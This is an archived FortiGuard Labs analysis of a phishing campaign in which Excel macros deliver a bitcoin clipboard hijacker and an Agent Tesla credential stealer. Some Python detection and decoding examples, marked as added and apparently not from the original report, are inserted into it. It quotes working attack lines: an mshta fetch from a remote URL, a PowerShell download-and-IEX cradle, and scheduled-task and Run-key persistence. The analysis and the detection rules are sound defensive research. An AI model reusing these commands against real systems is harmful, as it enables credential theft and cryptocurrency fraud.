{
	"id": "71f90994-1234-4c53-8c6f-c92654acfc2a",
	"created_at": "2026-04-06T00:06:43.817051Z",
	"updated_at": "2026-04-10T13:11:54.691273Z",
	"deleted_at": null,
	"sha1_hash": "7a98212ea6275ca0384416efae06d8c565141267",
	"title": "Phishing Malware Hijacks Bitcoin Addresses and Delivers New Agent Tesla Variant | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2652977,
	"plain_text": "Phishing Malware Hijacks Bitcoin Addresses and Delivers New Agent Tesla Variant | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-06-04 · Archived: 2026-04-05 17:02:53 UTC\r\nFortiGuard Labs recently captured a fresh phishing campaign in which a Microsoft Excel document attached to a spam email downloaded and executed several pieces of VBScript code. The VBScript hijacks bitcoin addresses on the victim’s clipboard and delivers a new variant of Agent Tesla onto the victim’s device.\r\nAgent Tesla, first seen in late 2014, is well-known spyware focused on stealing sensitive information from a victim’s device, such as saved application credentials and keystrokes (keylogging). We have published a number of detailed analyses of Agent Tesla campaigns captured by FortiGuard Labs over the past several years.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows users\r\nImpact: Sensitive information collected from the victim’s device\r\nSeverity level: Critical\r\nInterestingly, Agent Tesla is commercial software that is sold online, as shown in Figure 1.1, below.\r\nFigure 1.1 - Agent Tesla for sale on a webpage\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 1 of 16\r\nOn the website shown above, attackers can purchase it anonymously using the payment methods \"Perfect Money\" or \"Bitcoin Payment\".\r\nI researched this latest phishing campaign, and in this post I will share my findings on how the campaign starts, what the macro inside the attached Microsoft Excel file does and how it is triggered, how the follow-on scripts perform the bitcoin address hijack, and how they deliver a new variant of Agent Tesla onto the victim’s device.\r\nAnalysis of the Excel File from the Phishing Email\r\nFigure 2.1 – The spam email content\r\nAs you may have noticed in Figure 2.1, the subject has been marked with “SPAM detected by FortiMail” to notify the customer that the email is spam. The email asks the recipient to open the attached Microsoft Excel file to view the details of a document entitled “Order Requirements and Specs.” Once the victim opens the file in Microsoft Excel, however, a security warning pops up, as shown in Figure 2.2, because the workbook contains a macro.\r\nFigure 2.2 – Warning when opening the attached Excel document\r\nThe workbook itself is empty and its sheets are hidden. It contains a password-protected VBA project (the macro), which I opened by modifying the protection bytes in the file’s binary data. The VBA project implements the predefined event handler Workbook_BeforeClose(), which Excel calls automatically when the victim closes the document, so the payload fires on close rather than on open.\r\nWhen called, it displays two UserForms showing the string “ERROR!”, one after the other. When the second form is closed, it executes a command loaded from an OptionButton’s Tag property. As you can see in Figure 2.3, it is about to execute “Shell# UserForm2.OptionButton1.Tag” (the trailing \"_\" in Figure 2.3 is VBA’s line-continuation character), which runs the command line \"mshta hxxp://www[.]j[.]mp/ais1kdoaksodjasod14\" stored in the property “UserForm2.OptionButton1.Tag”. Storing the command in a form control’s property keeps it out of the macro source itself.\r\nFigure 2.3 – Running a command loaded from a property value\r\nmshta.exe is the Microsoft HTML Application Host, the Windows utility that executes HTA (HTML Application) files. An HTA file is a Windows program whose source consists of HTML, Dynamic HTML, and script such as VBScript or JScript. Because mshta.exe is a Microsoft-signed binary that will fetch and run script from a URL given on its command line, it is a popular living-off-the-land stager.\r\nThe URL “hxxp://www[.]j[.]mp/ais1kdoaksodjasod14” redirects to “hxxp://bit[.]ly/ais1kdoaksodjasod14” and finally to “hxxps://p8hj[.]blogspot[.]com/p/27.html” (“27.html”). As you may have guessed, the response from “27.html” contains malicious code, VBScript in this case, encoded with the escape() function.\r\nThere are three segments of VBScript code in the response from “27.html”. Figure 2.4 highlights the three segments, which are decoded and executed inside the mshta.exe process. In the next section I will demonstrate what each of the three segments does.\r\nFigure 2.4 – Three pieces of VBScript code in “27.html”\r\nThree Segments of VBScript Code\r\n1. Overview of the new Agent Tesla variant, the Auto-Run group, and Task Scheduler\r\nFigure 3.1 – The first VBScript segment after unescaping\r\nCalling unescape() twice on the first segment of VBScript code yields the HTML content shown in Figure 3.1. 
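\r\nThe two-round unescape() decoding just described, as an added Python example (not from the report and not FortiGuard Labs code): js_unescape() reproduces the escape()/unescape() rules (%uXXXX and %XX sequences, malformed ones left in place), decode_layers() applies it until the text stops changing and reports how many layers were peeled off, and vbscript_segments() pulls the script elements whose language attribute is VBScript out of the result. The HTA body it decodes is a constructed stand-in for 27.html, double-encoded with a matching js_escape() so the example runs offline; nothing is fetched from the real URLs.\r\n
```python
import re

# escape() leaves these characters alone; everything else becomes %XX or %uXXXX.
SAFE = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./')
ESC_RE = re.compile('%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
SCRIPT_RE = re.compile('<script[^>]*language=.?VBScript.?[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)

def js_escape(text):
    # Mirror of escape(); used here only to build the encoded sample.
    out = []
    for ch in text:
        if ch in SAFE:
            out.append(ch)
        elif ord(ch) < 256:
            out.append('%%%02X' % ord(ch))
        else:
            out.append('%%u%04X' % ord(ch))
    return ''.join(out)

def js_unescape(text):
    # unescape(): %uXXXX -> UTF-16 code unit, %XX -> byte value; anything malformed stays as-is.
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return ESC_RE.sub(repl, text)

def decode_layers(text, max_layers=8):
    # Apply unescape() until the text stops changing. Returns (decoded, layers_removed).
    # Caveat: plaintext that itself contains a literal %XX would be decoded one round too far.
    layers = 0
    while layers < max_layers:
        decoded = js_unescape(text)
        if decoded == text:
            break
        text = decoded
        layers += 1
    return text, layers

def vbscript_segments(html):
    return [m.group(1).strip() for m in SCRIPT_RE.finditer(html)]

DQ = chr(34)  # double-quote character, used to assemble the VBScript sample
# Constructed stand-in for the decoded 27.html body; the task name and commands echo the report.
SAMPLE_HTML = (
    '<html><head><script language=' + DQ + 'VBScript' + DQ + '>' +
    'Set MicrosoftWINdows = CreateObject(' + DQ + 'WScript.Shell' + DQ + ') : ' +
    'MicrosoftWINdows.run ' + DQ + 'schtasks /create /sc MINUTE /mo 80 /tn WIND0WSUPLATE /F /tr mshta' + DQ + ', 0' +
    '</script></head><body>' +
    '<script language=' + DQ + 'VBScript' + DQ + '>' +
    'CreateObject(' + DQ + 'WScript.Shell' + DQ + ').Run ' + DQ + 'taskkill /f /im Excel.exe' + DQ + ', 0' +
    '</script></body></html>'
)
# Two rounds of escape(), matching how the first segment in the campaign was encoded.
SAMPLE_ENCODED = js_escape(js_escape(SAMPLE_HTML))

def analyze(encoded=SAMPLE_ENCODED):
    html, layers = decode_layers(encoded)
    return {'layers': layers, 'segments': vbscript_segments(html)}

if __name__ == '__main__':
    result = analyze()
    print('escape() layers removed:', result['layers'])
    for i, seg in enumerate(result['segments'], 1):
        print('segment', i, ':', seg)
```
Point analyze() at the raw body saved from a proxy or sandbox capture to get the same two-layer result the post describes; the layer count is itself a useful triage signal, since benign pages are not escape()-encoded at all.\r\n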
This content contains VBScript that performs the three tasks described below.\r\nDownloads PowerShell files to deliver the new Agent Tesla variant\r\nIt calls Run() on its shell object, named MicrosoftWINdows in the script (a WScript.Shell instance, judging by the Run() and RegWrite() methods it uses), with the following argument:\r\n\"cmd /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('hxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-1.txt') -useB);i'E'x(iwr(' hxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-2.txt') -useB);i'E'x(iwr(' hxxps://ia801500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-3.txt') -useB)\"\r\nThe switches are abbreviated PowerShell parameters: -ex Bypass is -ExecutionPolicy Bypass, -nOp is -NoProfile, and -w 1 is -WindowStyle Hidden; iwr is Invoke-WebRequest, -useB is -UseBasicParsing, and i'E'x is the Invoke-Expression alias IEX with quote characters spliced in to break naive string matching. PowerShell therefore downloads three scripts from three archive.org URLs and executes each one in memory. Every downloaded script carries two EXE files stored in two huge byte arrays.\r\nThe two EXE files are a loader and the new Agent Tesla variant. Below is a segment of code extracted from “27-1.txt” showing how the loader is invoked.\r\n[Reflection.Assembly]::Load($Cli555).GetType('WpfControlLibrary1.LOGO').GetMethod('Run').Invoke($null, [object[]] ('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe',$Cli444));\r\nAs you can see, it loads the loader assembly from the array $Cli555 through Reflection and calls its method “WpfControlLibrary1.LOGO.Run()”, which takes two parameters: the path of a legitimate EXE (“MSBuild.exe”) and the new Agent Tesla variant stored in the huge array $Cli444. Run() starts MSBuild.exe and injects the Agent Tesla payload into it, so Agent Tesla executes under the name of a legitimate Microsoft binary, which helps it escape the victim’s notice and any tooling that trusts the process name. I’ll explain the details of “WpfControlLibrary1.LOGO.Run()” later.\r\nThe VBScript code adds numerous items into the Auto-Run group in the system registry\r\nFigure 3.2 shows a screenshot of the Auto-Run group (the Run key) in the system registry of an infected system. The script writes these values through a WMI (Windows Management Instrumentation) object, calling the StdRegProv method SetStringValue() rather than the WScript.Shell RegWrite() it uses elsewhere.\r\nFigure 3.2 – Auto-run group in system registry\r\nCreates a scheduled task\r\nBesides adding items to the Auto-Run group, it creates a scheduled task in Task Scheduler so the stager is re-fetched and re-run at regular intervals, which keeps the campaign effective even if one of the other persistence mechanisms is removed.\r\nBelow is the code used to run “schtasks” to create the task. The task name is “WIND0WSUPLATE” (with a zero in place of the O). Its action is to execute the command “mshta hxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html”, and it runs every 80 minutes. The “1230948%1230948@” prefix is a URL userinfo component: it does not change which page is fetched, but it makes the blogspot host less obvious to a casual reader.\r\nMicrosoftWINdows.run \"schtasks /create /sc MINUTE /mo 80 /tn \\\"WIND0WSUPLATE\\\" /F /tr \\\"MsHtA\\\" \\\"hxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html\\\"\" ,0\r\n2. Hijacking a Bitcoin address on the victim’s device\r\nDecoding the second segment gives the second piece of VBScript code. Executing it saves a block of PowerShell code into the system registry under the subkey \"HKCU\\Software\\nasdnasndnad\". It also adds an Auto-Run entry that executes this PowerShell code, so the hijacker starts at every user logon (see the item “replcia” in Figure 3.2).\r\nTo do so, it executes the following code.\r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\replcia\", \"mshta vbscript:Execute(\"\"CreateObject(\"\"\"\"Wscript.Shell\"\"\"\").Run \"\"\"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\"\"\", 0 : window.close\"\")\", EXCELX\r\nNote that no script file is written to disk: the Run value invokes mshta with an inline vbscript: URI, which starts a hidden PowerShell that reads the payload back out of the registry with Get-ItemProperty (gp) and pipes it to IEX.\r\nGoing through the PowerShell code we can see that it performs a bitcoin address hijack. It does this by continually polling the system clipboard; if the clipboard holds a valid bitcoin address, it replaces that address with the attacker’s. 
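\r\nThe address check and clipboard swap described here, as an added Python example (not the campaign’s PowerShell and not FortiGuard Labs code): is_bitcoin_address() performs the Base58Check validation that a function like the malware’s isBitcoinAddress() needs (Base58 alphabet, 25-byte decode, version byte 0x00 or 0x05, double-SHA-256 checksum), and find_clipboard_swaps() is the defensive counterpart, run over a constructed sequence of clipboard observations to flag any point where a valid address the user copied has been silently replaced by a different valid address. The second address is generated from constructed bytes with the included encoder so it is valid by construction; the attacker address quoted in the post is not used.\r\n
```python
import hashlib

ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
INDEX = {c: i for i, c in enumerate(ALPHABET)}
VERSION_P2PKH = 0x00   # legacy addresses starting with 1
VERSION_P2SH = 0x05    # script-hash addresses starting with 3

def checksum(payload):
    # Base58Check checksum: first four bytes of SHA-256(SHA-256(payload)).
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]

def base58check_encode(version, hash160):
    payload = bytes([version]) + hash160
    data = payload + checksum(payload)
    n = int.from_bytes(data, 'big')
    digits = []
    while n > 0:
        n, r = divmod(n, 58)
        digits.append(ALPHABET[r])
    # Each leading zero byte is encoded as a leading '1'.
    pad = len(data) - len(data.lstrip(bytes([0])))
    return '1' * pad + ''.join(reversed(digits))

def base58check_decode(addr):
    # Returns (version, hash160) or None if the string is not a valid Base58Check address.
    if not addr or any(c not in INDEX for c in addr):
        return None
    n = 0
    for c in addr:
        n = n * 58 + INDEX[c]
    pad = len(addr) - len(addr.lstrip('1'))
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big') if n else bytes()
    data = bytes([0]) * pad + body
    if len(data) != 25 or checksum(data[:21]) != data[21:]:
        return None
    return data[0], data[1:21]

def is_bitcoin_address(text):
    # Legacy (Base58) mainnet P2PKH or P2SH address with a valid checksum.
    decoded = base58check_decode(text.strip())
    return decoded is not None and decoded[0] in (VERSION_P2PKH, VERSION_P2SH)

def find_clipboard_swaps(observations):
    # observations: (source, text) pairs in time order; source is 'user' for a copy the user made
    # and 'poll' for what a later clipboard read returned. A swap is a poll that holds a valid
    # address different from the valid address the user last copied.
    swaps = []
    expected = None
    for source, text in observations:
        if source == 'user':
            expected = text.strip() if is_bitcoin_address(text) else None
        elif expected is not None and is_bitcoin_address(text) and text.strip() != expected:
            swaps.append((expected, text.strip()))
    return swaps

# Constructed sample: the well-known genesis-block P2PKH address, plus a second address built
# from a constructed 20-byte hash so it is valid by construction (no real wallet is referenced).
GENESIS_ADDR = '1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa'
ATTACKER_ADDR = base58check_encode(VERSION_P2PKH, bytes(range(1, 21)))
SAMPLE_OBSERVATIONS = [
    ('user', 'invoice 4711 ready'),
    ('poll', 'invoice 4711 ready'),
    ('user', GENESIS_ADDR),
    ('poll', GENESIS_ADDR),
    ('poll', ATTACKER_ADDR),      # the hijacker has rewritten the clipboard
    ('user', 'hello'),
    ('poll', 'hello'),
]

if __name__ == '__main__':
    for victim, replacement in find_clipboard_swaps(SAMPLE_OBSERVATIONS):
        print('clipboard swap:', victim, '->', replacement)
```
The swap check only needs the pairing of what was copied with what is later read back, so the same logic can be wired to a real clipboard listener; note that a hijacker targeting newer bech32 (bc1...) addresses would need a different validator, since Base58Check does not cover them.\r\n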
The malware implements this with a “while” loop and a helper function that checks whether a string is a valid bitcoin address. The loop reads the clipboard periodically by calling Get-Clipboard, then calls isBitcoinAddress() to determine whether the data is a valid bitcoin address. If so, it calls Set-Clipboard to overwrite the clipboard with the attacker’s address, which in this case is “19VFGWgBkn6J3kMd8ApfCbtbNUmg8eBMvp”. Figure 3.3 shows the PowerShell code used to hijack a bitcoin address.\r\nFigure 3.3 – Code to hijack a Bitcoin address\r\nPeople usually copy and paste the payee’s bitcoin address through the clipboard to make a payment. In that window the hijacker swaps the payee’s address for the attacker’s, and because bitcoin addresses are long and look random, the victim typically pastes and confirms the wrong address without noticing that the bitcoins went to the wrong payee.\r\n3. Killing All Microsoft Excel and Word Processes\r\nThe decoded code for this segment is listed below. It runs the “taskkill” command to terminate all running Microsoft Excel and Word processes, which forcibly kills the Excel.exe instance that launched mshta.exe in the first place and removes the decoy document from view.\r\n\u003cscript language=\"VBScript\"\u003e\r\nCreateObject(\"WScript.Shell\").Run \"taskkill /f /im Excel.exe\", 0\r\nCreateObject(\"WScript.Shell\").Run \"taskkill /f /im winword.exe\", 0\r\nwindow.resizeTo 0, 0\r\nself.close\r\n\u003c/script\u003e\r\nAt this point we have finished analyzing the first stage of this attack and what each of the three VBScript segments does. Next, I will focus on the loader and the new Agent Tesla variant started by the first segment.\r\nAnalysis of the Loader Process of Agent Tesla\r\nAs I mentioned earlier, “mshta.exe” runs three segments of VBScript code from 27.html. The first one dynamically loads a .NET EXE (“the loader”) from an array ($Cli555) and calls its function WpfControlLibrary1.LOGO.Run() to deploy the real Agent Tesla from another array into an MSBuild.exe process.\r\nI manually extracted the loader to a local file; Figure 4.1 shows the Run() function in the dnSpy debugger.\r\nFigure 4.1 – “WpfControlLibrary1.LOGO.Run()” to load Agent Tesla\r\nThe Run() function takes the full path of the target process ('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe') as its first parameter and the binary data of the Agent Tesla variant as its second. It then calls another function, PEfX2B8Tl(), to deploy this Agent Tesla variant into the target process. As you can see in Figure 4.1, I have simplified the function for a clearer view.\r\nPEfX2B8Tl() first calls the API function CreateProcess() with the creation flag 0x4 (CREATE_SUSPENDED) to create a suspended MSBuild.exe process. It then calls the familiar sequence GetThreadContext(), ReadProcessMemory(), NtUnmapViewOfSection(), VirtualAllocEx(), WriteProcessMemory(), SetThreadContext(), and ResumeThread(): the textbook process-hollowing (RunPE) technique, in which the suspended process’s original image is unmapped, the payload PE is written into its address space, and the main thread’s entry point is redirected to the payload before the thread is resumed. 
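\r\nThe execution chain and persistence artifacts described in this post (Excel spawning mshta.exe with a URL, the cmd/PowerShell download cradle, MSBuild.exe started by PowerShell with nothing to build, the schtasks task and the Run-key value that re-launch mshta), as an added detection example that is not from the report or FortiGuard Labs: a handful of rules are run over constructed Sysmon-style process-creation and registry events. The field names follow the Sysmon schema (Image, ParentImage, CommandLine, TargetObject, Details); the events themselves are made up to resemble the tree in Figure 4.2, and the command lines reuse the defanged URLs quoted above, so nothing is contacted.\r\n
```python
BS = chr(92)  # backslash, the Windows path separator

def winpath(*parts):
    return BS.join(parts)

def basename(path):
    return path.rsplit(BS, 1)[-1].lower()

def norm_cmd(cmdline):
    # Lower-case and drop the quote characters attackers splice into cmdlet names (i'E'x -> iex).
    return cmdline.replace(chr(39), '').replace(chr(34), '').lower()

OFFICE = {'excel.exe', 'winword.exe', 'powerpnt.exe'}
SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe'}
BUILD_FILE_EXTS = ('.proj', '.csproj', '.vbproj', '.sln', '.targets', '.xml')

def rule_office_spawns_mshta(ev):
    return ev['EventType'] == 'ProcessCreate' and basename(ev['Image']) == 'mshta.exe' and basename(ev['ParentImage']) in OFFICE

def rule_mshta_remote_url(ev):
    # mshta handed a URL runs whatever the server returns; local .hta files carry no scheme.
    return ev['EventType'] == 'ProcessCreate' and basename(ev['Image']) == 'mshta.exe' and '://' in ev['CommandLine']

def rule_powershell_download_cradle(ev):
    if ev['EventType'] != 'ProcessCreate' or basename(ev['Image']) not in ('powershell.exe', 'pwsh.exe'):
        return False
    cmd = norm_cmd(ev['CommandLine'])
    downloads = any(k in cmd for k in ('iwr', 'invoke-webrequest', 'downloadstring', 'downloadfile', 'net.webclient'))
    executes = 'iex' in cmd or 'invoke-expression' in cmd
    return downloads and executes

def rule_hollowed_msbuild(ev):
    # MSBuild.exe launched by a script host with no project file on its command line has nothing
    # legitimate to build; in this campaign it is the hollowing target for Agent Tesla.
    if ev['EventType'] != 'ProcessCreate' or basename(ev['Image']) != 'msbuild.exe':
        return False
    if basename(ev['ParentImage']) not in SCRIPT_HOSTS:
        return False
    return not any(ext in ev['CommandLine'].lower() for ext in BUILD_FILE_EXTS)

def rule_schtasks_mshta(ev):
    if ev['EventType'] != 'ProcessCreate' or basename(ev['Image']) != 'schtasks.exe':
        return False
    cmd = norm_cmd(ev['CommandLine'])
    return '/create' in cmd and 'mshta' in cmd

def rule_run_key_script_host(ev):
    # Sysmon event 13 (RegistryEvent SetValue) on a Run key whose data launches a script host.
    if ev['EventType'] != 'RegistrySet':
        return False
    in_run_key = (BS + 'currentversion' + BS + 'run' + BS) in ev['TargetObject'].lower()
    data = norm_cmd(ev['Details'])
    return in_run_key and any(k in data for k in ('mshta', 'vbscript:', 'powershell', 'iex'))

RULES = [
    ('office_spawns_mshta', rule_office_spawns_mshta),
    ('mshta_remote_url', rule_mshta_remote_url),
    ('powershell_download_cradle', rule_powershell_download_cradle),
    ('hollowed_msbuild', rule_hollowed_msbuild),
    ('schtasks_mshta', rule_schtasks_mshta),
    ('run_key_script_host', rule_run_key_script_host),
]

def detect(events):
    # Returns (rule name, event Id) for every rule that fires, in event order.
    return [(name, ev['Id']) for ev in events for name, rule in RULES if rule(ev)]

def proc(id_, image, parent, cmdline):
    return {'Id': id_, 'EventType': 'ProcessCreate', 'Image': image, 'ParentImage': parent, 'CommandLine': cmdline}

def regset(id_, image, target, details):
    return {'Id': id_, 'EventType': 'RegistrySet', 'Image': image, 'TargetObject': target, 'Details': details}

# Constructed events modelled on the process tree in Figure 4.2; URLs are the defanged ones from the post.
WINDIR = winpath('C:', 'Windows')
SYS32 = winpath(WINDIR, 'System32')
PS_EXE = winpath(SYS32, 'WindowsPowerShell', 'v1.0', 'powershell.exe')
OFFICE16 = winpath('C:', 'Program Files', 'Microsoft Office', 'root', 'Office16')
NET4 = winpath(WINDIR, 'Microsoft.NET', 'Framework', 'v4.0.30319')
RUN_KEY = winpath('HKU', 'S-1-5-21-1-2-3-1001', 'Software', 'Microsoft', 'Windows', 'CurrentVersion', 'Run')
CRADLE = '''PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('hxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-1.txt') -useB)'''
SAMPLE_EVENTS = [
    proc(1, winpath(OFFICE16, 'EXCEL.EXE'), winpath(WINDIR, 'explorer.exe'), 'EXCEL.EXE Order Requirements and Specs.xls'),
    proc(2, winpath(SYS32, 'mshta.exe'), winpath(OFFICE16, 'EXCEL.EXE'), 'mshta hxxp://www[.]j[.]mp/ais1kdoaksodjasod14'),
    proc(3, winpath(SYS32, 'cmd.exe'), winpath(SYS32, 'mshta.exe'), 'cmd /c start /min ' + CRADLE),
    proc(4, PS_EXE, winpath(SYS32, 'cmd.exe'), CRADLE),
    proc(5, winpath(NET4, 'MSBuild.exe'), PS_EXE, winpath(NET4, 'MSBuild.exe')),
    proc(6, winpath(SYS32, 'schtasks.exe'), winpath(SYS32, 'mshta.exe'), 'schtasks /create /sc MINUTE /mo 80 /tn WIND0WSUPLATE /F /tr mshta hxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html'),
    regset(7, winpath(SYS32, 'mshta.exe'), winpath(RUN_KEY, 'replcia'), 'mshta vbscript:Execute(CreateObject(Wscript.Shell).Run powershell ((gp HKCU:' + BS + 'Software).nasdnasndnad)|IEX, 0 : window.close)'),
    proc(8, winpath(NET4, 'MSBuild.exe'), winpath('C:', 'Program Files', 'Microsoft Visual Studio', 'devenv.exe'), 'MSBuild.exe App.csproj /t:Build'),  # benign build
    proc(9, PS_EXE, winpath(WINDIR, 'explorer.exe'), 'powershell -NoProfile -Command Get-Date'),  # benign admin use
]

if __name__ == '__main__':
    for name, event_id in detect(SAMPLE_EVENTS):
        print('event', event_id, 'matched', name)
```
Each rule is deliberately narrow so it can be reviewed on its own; in production the office-to-mshta and hollowed-MSBuild rules are the high-confidence ones, while the download-cradle keyword match will want allow-listing for legitimate automation.\r\n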
Once ResumeThread() returns, Agent Tesla is executing inside the target process “MSBuild.exe”.\r\nTo show the entire picture of the malicious activity that started from the phishing email, I have attached a screenshot of the process tree below, which shows all relevant processes involved in the campaign and the relationships between them.\r\nFigure 4.2 – Process tree of all relevant processes of the campaign\r\nAgent Tesla Running Within MSBuild.exe Process to Steal Data\r\nI extracted this new Agent Tesla variant to a local file from the large array ($Cli444) for static analysis. As Figure 5.1 shows, the variant is fully obfuscated, which protects its code from being analyzed easily by security researchers.\r\nThe class, function, and variable names are meaningless, as shown in Figure 5.1 (“A”, “a”, “B”, “b”, “C”, “c”, and so on). For instance, the entry point of this variant is “A.b.A()”.\r\nFigure 5.1 – Obfuscated new variant of Agent Tesla\r\nWhen Agent Tesla starts in MSBuild.exe, it first checks whether another Agent Tesla instance is already running. If one is found, it is killed so that only one instance runs at a time.\r\nEvery time it runs, it steals the credentials saved by applications on the infected device (web browsers, FTP clients, IM clients, etc.) and sends the stolen data to the attacker.\r\nAccording to my research, it steals sensitive information from 73 different applications, which can be categorized by their features as below:\r\nWeb Browsers:\r\n\"Chrome\", \"Firefox\", \"Edge\", \"Safari\", \"SRWare Iron\", \"CoolNovo\", \"QQ Browser\", \"UC Browser\", \"Elements Browser\", \"QIP Surf\", \"Epic Privacy\", \"Amigo\", \"Coccoc\", \"Coowon\", \"Torch Browser\", \"Orbitum\", \"Yandex Browser\", \"Sputnik\", \"Chedot\", \"Vivaldi\", \"Iridium Browser\", \"360 Browser\", \"Chromium\", \"Opera Browser\", \"Sleipnir 6\", \"Liebao Browser\", \"CentBrowser\", \"Brave\", \"Cool Novo\", \"Citrio\", \"Uran\", \"7Star\", \"Kometa\", \"Comodo Dragon\", \"K-Meleon\", \"FALKON\", \"IceCat\", \"Flock\", \"WaterFox\", \"PaleMoon\", \"UCBrowser\", \"IceDragon\", \"QQBrowser\", \"SeaMonkey\", \"BlackHawk\", \"CyberFox\"\r\nEmail Clients and Messenger Clients:\r\n\"Postbox\", \"Foxmail\", \"Eudora\", \"Mailbird\", \"Becky!\", \"Opera Mail\", \"Outlook\", \"Thunderbird\", \"eM Client\", \"IncrediMail\", \"Claws-mail\", \"The Bat!\", \"Pocomail\", \"Psi\", \"Trillian\"\r\nVPN, FTP Clients and Download Managers:\r\n\"DownloadManager\", \"jDownloader\", \"OpenVPN\", \"SmartFTP\", \"FTPGetter\", \"WS_FTP\", \"FileZilla\", \"CFTP\", \"FTP Navigator\", \"CoreFTP\", \"WinSCP\", \"FlashFXP\"\r\nFigure 5.2 shows the moment it has obtained sensitive data from Mozilla Firefox. This data contains user credentials (UserName and Password), the application name “Firefox”, and the URLs for which the credentials were saved. The data is then sent to the attacker with the magic flag “PW_”. 
I will elaborate later on how the stolen data is sent to the attacker.\r\nFigure 5.2 – Display of sensitive data stolen from Mozilla Firefox\r\nIt also starts a thread that collects cookie files from a predefined set of web browsers. The collected cookie files are compressed into a ZIP archive and sent to the attacker with the magic flag “CO_”. Figure 5.3 is an example of such a ZIP archive, containing the cookie files collected from Mozilla Firefox and Google Chrome on my test machine.\r\nFigure 5.3 – Tree view of one ZIP archive with collected cookie files\r\nIn addition to what I explained above, it also collects data from the system clipboard and the victim’s keystrokes (the keylogger). It calls the API SetClipboardViewer() to register itself in the clipboard viewer chain so that it is notified whenever the clipboard contents change, at which point it reads and saves the clipboard data.\r\nThe attacker also enabled the keylogger feature in this variant. It installs a low-level keyboard hook, WH_KEYBOARD_LL (13), by calling the API function SetWindowsHookEx(), so it receives every keyboard message as the victim types. Both the clipboard data and the keystrokes are saved in HTML format in a global variable. Agent Tesla starts a Timer (fired every 20 minutes) that checks whether the global variable holds data and, if so, sends it to the attacker with the magic flag “KL_”.\r\nFigure 5.4 shows an example of the keystroke and clipboard data that I extracted at the moment it was sent to the attacker.\r\nFigure 5.4 – Example of collected keylogger and clipboard data\r\nAs you can see, this data contains basic information, including the current time, user name, computer name, OS version, CPU type, and memory capacity. The keylogger data contains the application name (“Google Chrome”), the application title (“New Tab – Google Chrome”), the current time (05/21/2021 10:48:18), and the victim’s keystrokes on the second line. The clipboard data starts with the constant string “Copied Text:” followed by the clipboard contents on the second line.\r\nSending Stolen Data to the Attacker\r\nAgent Tesla supports several ways to send stolen data to its C2 server: over SMTP to the attacker’s email address, over FTP to the attacker’s FTP server, and over HTTP POST to the attacker’s HTTP server.\r\nThe variant we captured uses the FTP STOR (store) command to submit the stolen sensitive data.\r\nAgent Tesla uses several magic flags to identify what kind of data is being reported: “PW_” for credentials, “CO_” for cookie files, “KL_” for keylogger and clipboard data, and “SC_” for screenshots (not enabled in this variant). The data file name consists of the magic flag, user name, computer name, and current time. 
\r\nFigure 6.1 shows a Wireshark screenshot of the transfer in an FTP-DATA packet (with the magic flag “PW_”) containing stolen credentials saved in Firefox and FileZilla. Because FTP is a clear-text protocol, the whole exchange, including the attacker’s FTP login and the uploaded file, is readable in a packet capture.\r\nFigure 6.1 – FTP packet with stolen credentials\r\nConclusion\r\nMost attackers like to spread malware through phishing emails, and FortiGuard Labs detects new phishing campaigns every day. People should be careful when opening files attached to email.\r\nThe campaign I just analyzed not only used VBScript to hijack the victim’s clipboard but also delivered a new variant of Agent Tesla. In this post I walked through the campaign, beginning with how the malicious macro inside the attached Microsoft Excel document is executed. I then elaborated on how the three VBScript segments in the response from 27.html perform the bitcoin address hijack and launch the new Agent Tesla variant. Next, I showed which applications this variant steals sensitive data from and what kind of data Agent Tesla is interested in, including saved credentials, browser cookie files, keylogger data, and clipboard data. Finally, I showed how the stolen data is submitted to the attacker in FTP-DATA packets.\r\nFortinet Protections\r\nFortinet customers are already protected from this Agent Tesla variant by FortiGuard’s Web Filtering, Anti-Spam, and AntiVirus services, as follows:\r\nThe related URLs listed in the IOCs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe phishing email has been marked as SPAM by FortiMail. The attached Excel file is detected as “VBA/Agent.WCN!tr” and blocked by the FortiGuard AntiVirus service.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR, each of which includes the Fortinet AntiVirus engine. As a result, customers running up-to-date versions of these products are protected.\r\nWe also suggest our readers go through the free NSE training, NSE 1 – Information Security Awareness, which has a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing 